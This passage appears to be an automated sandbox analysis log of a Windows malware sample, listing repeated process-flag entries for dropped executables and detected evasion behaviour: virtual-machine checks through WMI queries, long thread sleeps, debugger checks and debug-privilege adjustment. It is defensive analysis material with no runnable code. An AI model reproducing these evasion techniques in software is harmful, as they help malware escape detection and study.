            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeMemory allocated: 1B2D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeMemory allocated: 1AA60000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeMemory allocated: 7E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeMemory allocated: 1A610000 memory reserve | memory write watchJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeMemory allocated: D50000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeMemory allocated: 1A8F0000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeMemory allocated: 15F0000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeMemory allocated: 1B4A0000 memory reserve | memory write watch
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598840Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598619Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598442Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeThread delayed: delay time: 922337203685477
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWindow / User API: threadDelayed 532Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeWindow / User API: threadDelayed 1456Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWindow / User API: threadDelayed 366Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWindow / User API: threadDelayed 1493Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWindow / User API: threadDelayed 2142Jump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeWindow / User API: threadDelayed 363
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe TID: 7908Thread sleep count: 532 > 30Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe TID: 7908Thread sleep count: 1456 > 30Jump to behavior
            Source: C:\bridgehyperperfdhcp\intoDhcp.exe TID: 7884Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 2132Thread sleep count: 366 > 30Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 2416Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 5304Thread sleep count: 1493 > 30Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 5304Thread sleep count: 2142 > 30Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599108s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -598840s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -598734s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -598619s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 7488Thread sleep time: -598442s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 2304Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exe TID: 1720Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 7720Thread sleep count: 291 > 30
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 5244Thread sleep time: -922337203685477s >= -30000s
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 7684Thread sleep count: 363 > 30
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exe TID: 4940Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Program Files\Windows Portable Devices\Idle.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0017A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0017A5F4
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0018B8E0
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018DD72 VirtualQuery,GetSystemInfo,0_2_0018DD72
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598840Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598619Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 598442Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeThread delayed: delay time: 922337203685477
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeThread delayed: delay time: 922337203685477
            Source: wscript.exe, 00000001.00000003.1711808109.00000000028DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000001.00000003.1712916802.0000000002919000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: rWjaZEKha8.exe, 00000000.00000003.1659563451.000000000298D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
            Source: Idle.exe, 00000015.00000002.1867010896.000000001B7B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: rWjaZEKha8.exe, OjTEkrTlLyhdt.exe.4.dr, OjTEkrTlLyhdt.exe3.4.dr, OjTEkrTlLyhdt.exe4.4.dr, intoDhcp.exe.0.dr, OjTEkrTlLyhdt.exe2.4.dr, dasHost.exe.4.dr, OjTEkrTlLyhdt.exe1.4.dr, TextInputHost.exe.4.dr, OjTEkrTlLyhdt.exe0.4.dr, upfc.exe.4.drBinary or memory string: VPHWwjkbNEiTrqEMU9
            Source: rWjaZEKha8.exe, 00000000.00000003.1658460406.0000000002971000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: wscript.exe, 00000001.00000003.1712916802.0000000002919000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeAPI call chain: ExitProcess graph end nodegraph_0-23625
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019866F
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019753D mov eax, dword ptr fs:[00000030h]0_2_0019753D
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0019B710 GetProcessHeap,0_2_0019B710
            Source: C:\bridgehyperperfdhcp\intoDhcp.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Portable Devices\Idle.exeProcess token adjusted: DebugJump to behavior
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess token adjusted: Debug
            Source: C:\bridgehyperperfdhcp\OjTEkrTlLyhdt.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\rWjaZEKha8.exeCode function: 0_2_0018F063 SetUnhandledExceptionFilter,0_2_0018F063
